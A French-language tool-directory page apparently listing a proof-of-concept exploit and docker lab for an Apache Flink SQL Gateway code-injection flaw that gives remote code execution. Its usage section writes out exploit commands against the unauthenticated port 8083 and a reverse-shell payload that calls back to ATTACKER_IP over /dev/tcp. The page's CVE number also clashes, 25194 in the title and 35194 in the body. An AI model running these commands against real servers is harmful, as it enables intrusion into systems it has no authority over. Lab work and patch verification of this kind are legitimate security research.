Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-25194 — Exploit de preuve de concept et environnement de laboratoire pour CVE-2026-25194 | Kitploit
Outils/GitHubGitHub/dexsemon/cve-2026-25194
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubdexsemon/cve-2026-25194

CVE-2026-25194

Exploit de preuve de concept et environnement de laboratoire pour CVE-2026-25194

Voir le dépôt
il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-35194 — Injection de code SQL dans Apache Flink

Exécution de code à distance sur les TaskManagers Apache Flink via l'injection dans la génération de code SQL.

CVECVE-2026-35194
CVSS8.1 (Élevé)
CWECWE-94 — Injection de code
Versions affectéesFlink 1.15.0 – 1.20.3 / 2.0.0 – 2.2.0
Versions corrigées1.20.4 / 2.0.2 / 2.1.2 / 2.2.1
Surface d'attaqueSQL Gateway REST API (port par défaut 8083, sans authentification)

Démarrage rapide

1. Déployer le laboratoire vulnérable

root@kitploit:~
docker compose up -d

Attendez ~30 s pour que le cluster démarre. Deux services se lancent :

  • Flink Web UI — http://localhost:8081
  • SQL Gateway REST API — http://localhost:8083

Vérifiez :

root@kitploit:~
curl -s http://localhost:8083/v1/info
# Should return version "1.20.3"

2. Installer les dépendances

root@kitploit:~
pip install requests

3. Exploitation

Vecteur JSON :

root@kitploit:~
python3 exploit.py localhost -p 8083 -v json -c "id > /tmp/pwned"

Vecteur LIKE :

root@kitploit:~
python3 exploit.py localhost -p 8083 -v like -c "id > /tmp/pwned"

Vérification de version uniquement (sans RCE) :

root@kitploit:~
python3 exploit.py localhost -p 8083 --check-only

Vérifier la RCE sur le TaskManager :

root@kitploit:~
docker exec flink-taskmanager cat /tmp/pwned

4. Shell inversé

root@kitploit:~
# Terminal 1 — listener
nc -lvnp 4444

# Terminal 2 — exploit
python3 exploit.py TARGET -p 8083 -v json \
  -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Utilisation

root@kitploit:~
usage: exploit.py [-h] [-p PORT] [-c COMMAND] [-v {json,like}]
                  [--check-only] [-t TIMEOUT] [--cert CERT] [--key KEY] [--ssl]
                  target

Options:
  target              Target host (IP or hostname)
  -p, --port          SQL Gateway port (default: 8083)
  -c, --command       Shell command to run on TaskManager
  -v, --vector        json (default) or like
  --check-only        Version check only, no exploit
  -t, --timeout       Request timeout in seconds (default: 30)
  --cert / --key      Client cert + key for mTLS environments
  --ssl               Force HTTPS

Avertissement

À des fins de recherche en sécurité autorisée et d'éducation uniquement.

Télécharger l’outil